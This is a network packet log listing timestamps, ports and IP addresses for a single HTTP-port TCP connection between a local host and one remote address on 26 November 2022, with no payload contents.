Nov 26, 2022 11:17:42.628218889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628232002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628249884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628253937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628263950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628268003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628304005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628844976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628864050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628881931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628901005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628918886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628920078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628937960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628953934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628956079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628973007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628992081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628998041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629009962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629029036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629029989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629049063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629054070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629067898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629086018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629097939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629105091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629123926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629143000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629146099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629160881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629168034 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629179001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629196882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629201889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629215956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629234076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629250050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629252911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629277945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.629957914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629977942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.629996061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630027056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630044937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630062103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630094051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630114079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630132914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630139112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630153894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630172968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630191088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630196095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630209923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630219936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630228996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630245924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630254030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630264997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630284071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630294085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630300999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630320072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630338907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630343914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630357027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630368948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630376101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630393982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630408049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630413055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630431890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630450964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630470037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630470991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630489111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630490065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630507946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.630507946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.630753040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631047010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631066084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631119013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631129980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631149054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631169081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631186962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631205082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631208897 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631223917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631232977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631242990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631261110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631279945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631294012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631299019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631318092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631320000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631336927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631350040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631357908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631377935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631397009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631405115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631417036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631422997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631436110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631453991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631469011 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631473064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631493092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631496906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631510973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631547928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631799936 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631819963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631860018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631866932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631885052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631911993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.631942987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631961107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631978989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.631998062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632016897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632035017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632035971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632045984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632052898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632066965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632072926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632091999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632097006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632111073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632128954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632148027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632150888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632164955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632174969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632184029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632201910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632210970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632220030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632236958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632239103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632257938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632276058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632294893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632320881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632709980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632741928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632760048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632777929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632795095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632806063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632812977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632832050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632834911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632848978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632857084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632868052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632885933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632896900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632903099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632924080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632941961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632946968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632961035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632968903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.632977962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632996082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.632998943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633013964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633032084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633049011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633050919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633065939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633076906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633085012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633102894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633112907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633121014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633140087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633675098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633692026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633728981 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633744955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633749008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633761883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633774996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633791924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633821964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633827925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633848906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633848906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633867025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633887053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633904934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633905888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633929968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633939981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633949995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633969069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.633976936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.633987904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634006977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634008884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634026051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634044886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634064913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634066105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634083033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634092093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634102106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634116888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634119987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634160995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634607077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634627104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634645939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634664059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634670019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634721994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634751081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634771109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634804964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634816885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.634967089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.634987116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635020971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635037899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635040045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635061026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635062933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635078907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635097027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635107040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635144949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635144949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635163069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635183096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635200977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635205984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635220051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635240078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635257959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635261059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635282040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635338068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635355949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635382891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635411978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635430098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635451078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635454893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635468960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635505915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635740995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635792971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635837078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635854959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635873079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635894060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635915041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635921955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635932922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635947943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635951042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635971069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.635977030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.635988951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636008024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636018038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636028051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636049032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636069059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636073112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636086941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636097908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636107922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636126041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636128902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636145115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636162043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636179924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636183977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636197090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636209965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636218071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636245012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636246920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636292934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636667013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636686087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636703968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636720896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636734009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636739016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636758089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636769056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636776924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636795044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636814117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636816025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636831045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636841059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636850119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636868000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636885881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636889935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636904001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636920929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636935949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636940002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636957884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636962891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636976004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.636976957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.636993885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637011051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637013912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637027979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637043953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637046099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637061119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637098074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637583017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637600899 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637618065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637636900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637639046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637653112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637665033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637670040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637689114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637706041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.637707949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.637725115 CET	80	49707	66.235.200.147	192.168.2.5
